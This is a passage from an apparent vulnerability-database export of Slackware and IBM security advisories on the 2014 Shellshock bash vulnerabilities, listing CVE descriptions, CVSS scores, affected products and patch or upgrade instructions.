Thanks to B. Watson for the bug report.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.018-i486-3_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.018-x86_64-3_slack13.0.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n17fe761daf847490e6286a6c59abd913 bash-3.1.018-i486-3_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n7eb0a4741287042658487f2b6089a4c5 bash-3.1.018-x86_64-3_slack13.0.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bash-3.1.018-i486-3_slack13.0.txz", "cvss3": {}, "published": "2014-09-25T16:07:03", "type": "slackware", "title": "bash (rebuild for Slackware 13.0 only)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T16:07:03", "id": "SSA-2014-0925160703", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.309194", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:46:43", "description": "New bash packages are available for Slackware 13.0 to fix a security issue.\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/bash-3.1.018-i486-3_slack13.0.txz: Rebuilt.\n The patch for CVE-2014-7169 needed to be rebased against bash-3.1 in order\n to apply correctly. Thanks to B. Watson for the bug report.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.018-i486-3_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.018-x86_64-3_slack13.0.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n17fe761daf847490e6286a6c59abd913 bash-3.1.018-i486-3_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n7eb0a4741287042658487f2b6089a4c5 bash-3.1.018-x86_64-3_slack13.0.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bash-3.1.018-i486-3_slack13.0.txz", "cvss3": {}, "published": "2014-09-25T23:07:03", "type": "slackware", "title": "SSA-2014-0925230703", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T23:07:03", "id": "SSA-2014-0925230703", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.309194", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2022-04-16T23:46:57", "description": "## Summary\n\nIBM Tivoli Workload Scheduler is not vulnerable to CVE-2014-6271 or CVE-2014-7169 Bash vulnerability as shipped out of the box, but action could be required because Tivoli Workload Scheduler installation on AIX through Launchpad requires bash.\n\n## Vulnerability Details\n\nCVE-2014-6271 and CVE-2014-7169 vulnerabilities (also called Shellshock) affects Bash that is delivered in Unix platforms. Fixes for Bash will come from Unix distribution. IBM Tivoli Workload Scheduler does not ship bash. \n\n## Affected Products and Versions\n\nEven if Tivoli Workload Scheduler doesn't ship bash in some cases bash is required: \n\\- Tivoli Workload Scheduler installation for all releases through Lauchpad requires bash on AIX and Firefox. \n\\- Tivoli Workload Scheduler 9.1 GA level requires bash for the prerequisite check: TWS 9.1 FP01 removes thsi requirement. \n\\- the \"version\" command for the following releases: \n8.4 (all fixpacks), 8.5 (all fixpacks but FP05), 8.5.1 (all fixpacks but FP05), 8.6 (GA only). This command is manually issued to display the current version of the product. \n\\- The Tivoli Dynamic Workload Console wastools commands backupConfig.sh and restoreConfig.sh commands require bash in the 9.1 FP01 and 9.2 GA level version. These commands are used to create backups of the current Tivoli Dynamic Workload Console configuration and/or clone it.\n\n## Remediation/Fixes\n\nIBM highly recommends upgrading your bash from your operating system vendor. If you cannot apply the fixes for bash please consider the above limitations.\n\n## Workarounds and Mitigations\n\nnone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSGSPN\",\"label\":\"IBM Workload Scheduler\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"}],\"Version\":\"8.4;8.5;8.5.1;8.6;9.1;9.2\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T14:50:13", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Workload Scheduler (CVE-2014-6271, CVE-2014-7169)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2018-06-17T14:50:13", "id": "FEADDA47EFE90B54452280140F698F39B3035C331C1D98DE94C00F9304C7DEFC", "href": "https://www.ibm.com/support/pages/node/252167", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nVulnerabilities in Bash affect SmartCloud Provisioning for IBM Provided Software Virtual Appliance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187).\n\n## Vulnerability Details\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. \n \n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/96153> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/96209> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nIBM SmartCloud Provisioning 2.1 FixPack 1 for Software Virtual Appliance to IBM SmartCloud Provisioning 2.1 FixPack 5 for Software Virtual Appliance \nIBM SmartCloud Provisioning 2.1 FixPack 4 Interim Fix 1 for Software Virtual Appliance \n\n## Remediation/Fixes\n\nThe recommended solution is to download the IBM SmartCloud Provisioning 2.1 FixPack 5 for Software Virtual Appliance for Software Virtual Appliance Interim Fix 1 from [_Fix Central_](<http://www-933.ibm.com/support/fixcentral/>) and apply it as soon as practical. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n \nSee the latest **IBM Cloud Orchestrator** fix release on [_IBM Fix Central_](<http://www.ibm.com/support/fixcentral/>). \n\n## Workarounds and Mitigations\n\nNone.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n* 09 October 2014: Original copy published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSZH3R\",\"label\":\"IBM Service Agility Accelerator for Cloud\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"Security\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.1;2.1.0.1;2.1.0.2;2.1.0.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-06-17T22:30:11", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect SmartCloud Provisioning for IBM Provided Software Virtual Appliance", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-06-17T22:30:11", "id": "03BFD2D26D76C5E7FD24C265B3AB1C4D658726D972FB7039E562EEE0BD578CC0", "href": "https://www.ibm.com/support/pages/node/252647", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-24T00:41:01", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM Security Network Intrusion Prevention System.\n\n## Vulnerability Details\n\n \n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \n**CVE-ID: **[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID:**[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\n**Products: **GX3002, GX4002, GX4004, GX4004-v2, GX5008, GX5008-v2, GX5108, GX5108-v2, GX5208, GX5208-v2, GX6116, GX7412, GX7412-10, GX7412-05, GX7800, GV200, GV1000 \n**Firmware versions: **4.6.2, 4.6.1, 4.6, 4.5, 4.4, and 4.3\n\n## Remediation/Fixes\n\nThe following IBM Threat Fixpacks have the fixes for these vulnerabilities: \n\n * [__4.6.2.0-ISS-ProvG-AllModels-System-FP0002__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)__ \n___for all IBM Security Network Intrusion Prevention System products at Firmware version 4.6.2_\n * [__4.6.1.0-ISS-ProvG-AllModels-System-FP0006__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)_ \n__for all IBM Security Network Intrusion Prevention System products at Firmware version 4.6.1_\n * [__4.6.0.0-ISS-ProvG-AllModels-System-FP0004__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)_ \n__for all IBM Security Network Intrusion Prevention System products at Firmware version 4.6_\n * [__4.5.0.0-ISS-ProvG-AllModels-System-FP0006__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)_ \n__for all IBM Security Network Intrusion Prevention System products at Firmware version 4.5_\n * [__4.4.0.0-ISS-ProvG-AllModels-System-FP0006__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)_ \n__for all IBM Security Network Intrusion Prevention System products at Firmware version 4.4_\n * [__4.3.0.0-ISS-ProvG-AllModels-System-FP0004__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_for all IBM Security Network Intrusion Prevention System products at Firmware version 4.3_\n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SS9SBT\",\"label\":\"Proventia Network Intrusion Prevention System\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF009\",\"label\":\"Firmware\"}],\"Version\":\"4.3;4.4;4.5;4.6;4.6.1;4.6.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-23T17:14:38", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect Network Intrusion Prevention System (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-02-23T17:14:38", "id": "9362FDC04C7CF0E7E11E00C238107A825074E1BBD7D4631CDE9FBBBA3D068B3A", "href": "https://www.ibm.com/support/pages/node/252417", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM InfoSphere Guardium Database Activity Monitoring.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See 